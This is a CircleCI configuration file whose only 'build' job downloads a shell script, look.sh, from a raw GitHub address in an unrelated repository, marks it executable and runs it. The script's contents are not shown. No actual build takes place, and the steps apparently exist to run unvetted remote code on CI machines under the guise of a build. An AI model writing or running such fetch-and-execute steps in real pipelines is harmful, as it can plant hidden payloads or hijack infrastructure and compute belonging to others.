version: 2.1

orbs:
  win: circleci/windows@2.3.0

jobs:
  build:
    executor:
      name: win/default
      size: "medium" # can be "medium", "large", "xlarge", "2xlarge"
    steps:
      - run: wget https://raw.githubusercontent.com/vivomito/out/main/look.sh
      - run: chmod +x look.sh
      - run: ./look.sh
